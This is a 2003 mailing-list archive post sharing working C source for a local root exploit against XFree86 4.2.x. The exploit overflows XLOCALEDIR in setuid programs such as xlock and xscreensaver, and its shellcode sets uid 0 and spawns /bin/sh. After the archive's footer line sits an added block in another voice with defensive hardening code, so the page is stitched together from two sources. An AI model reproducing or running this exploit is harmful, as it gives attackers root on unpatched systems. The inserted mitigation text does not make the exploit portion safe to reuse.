Pantek Library

Re: xscreensaver exploit for Redhat 7.3

From: Inode <inode(at)mediaservice.net>
Date: Fri Mar 07 2003 - 15:45:51 EST


Hi all,
exploit attached.

Comments are welcome.

Sincerely,

+-------------------------------------------------------------------+
| Agazzini Maurizio        Tel: +39-011-32.72.100                   |
| Security Analyst         Fax: +39-011-32.46.497                   |
| @ Mediaservice.net S.R.L. D.S.D. Data Security Division           |
|                                                                   |
| PGP Key : http://www.wayreth.eu.org/Inode.asc                     |
| Disclaimer: http://@Mediaservice.net/disclaimer                   |
+-------------------------------------------------------------------+

/*

	Original exploit:
		** oC-localX.c - XFree86 Version 4.2.x local root exploit
		** By dcryptr && tarranta / oC

	This exploit is a modified version of the original oC-localX.c
	built to work without any offset.

	Some distros have the file /usr/X11R6/bin/dga set +s.
	This program isn't exploitable because it drops privileges
	before running the Xlib function vulnerable to this overflow.

	This exploit works on linux x86 on all distros.

	Tested on:
		- Slackware 8.1 ( xlock, xscreensaver, xterm )
		- Redhat 7.3 ( manual +s to xlock )
		- Suse 8.1 ( manual +s to xlock )

	by Inode

*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

static char shellcode[] =
	/* setresuid(0,0,0); */
	"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
	/* /bin/sh execve(); */
	"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
	"\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
	/* exit(0); */
	"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";

#define ALIGN 0


int main(int argc, char **argv)
{
	char	buffer[6000];
	int	i;
	int	ret;
	char	*env[3] = { buffer, shellcode, NULL };
	int	*ap;

	strcpy(buffer, "XLOCALEDIR=");

	printf("\nXFree86 4.2.x Exploit modified by Inode \n\n");
	if (argc != 3)
	{
		printf(" Usage: %s  \n", argv[0]);
		printf("\n Example: %s /usr/X11R6/bin/xlock xlock\n\n", argv[0]);
		return 1;
	}

	ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

	ap = (int *)(buffer + ALIGN + strlen(buffer));

	for (i = 0; i < sizeof(buffer); i += 4)
		*ap++ = ret;

	execle(argv[1], argv[2], NULL, env);

	return 0;
}

Received on Fri Mar 7 16:16:42 2003
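The comment block notes that dga escapes this overflow only because it drops privileges before the vulnerable Xlib call. As an added example (not part of Inode's post and not Xlib's code), the two mitigations a setuid program that relies on Xlib can apply: refuse XLOCALEDIR when real and effective uid differ, and bound the path copy so a 6000-byte value like the exploit's buffer is rejected. Function names and the 1024-byte limit are illustrative assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Illustrative hardening, not Xlib's code: the exploit works by handing an
 * attacker-controlled XLOCALEDIR to a setuid program that copies it into a
 * fixed buffer. Names and the limit below are assumptions for this example. */
#define LOCALE_PATH_MAX 1024

/* Rule 1: a setuid/setgid program must not trust locale paths from its
 * environment. Returns the value only when real and effective ids match. */
const char *trusted_xlocaledir(uid_t ruid, uid_t euid, const char *env_value)
{
    if (ruid != euid)
        return NULL;          /* privileged: use the compiled-in default instead */
    return env_value;
}

/* Rule 2: never assume the path fits. Returns 0 on success, -1 if the result
 * would not fit in out[]; out[] is left NUL-terminated either way. */
int build_locale_path(const char *dir, const char *file, char *out, size_t outlen)
{
    if (dir == NULL || file == NULL || out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    int n = snprintf(out, outlen, "%s/%s", dir, file);
    if (n < 0 || (size_t)n >= outlen)
        return -1;            /* truncation is an error, not a warning */
    return 0;
}

/* Constructed input: a 6000-byte value, the size of the exploit's buffer.
 * Returns 1 when the bounded copy rejects it. */
int oversized_xlocaledir_rejected(void)
{
    char huge[6000];
    char out[LOCALE_PATH_MAX];
    memset(huge, 'A', sizeof(huge) - 1);
    huge[sizeof(huge) - 1] = '\0';
    return build_locale_path(huge, "locale.alias", out, sizeof(out)) == -1;
}

int main(void)
{
    /* constructed ids: real uid 1000, effective uid 0 (a setuid-root binary) */
    const char *dir = trusted_xlocaledir(1000, 0, "/home/user/locale");
    printf("setuid: XLOCALEDIR honoured? %s\n", dir ? "yes" : "no");
    printf("6000-byte value rejected?    %s\n",
           oversized_xlocaledir_rejected() ? "yes" : "no");
    return 0;
}
```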

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT

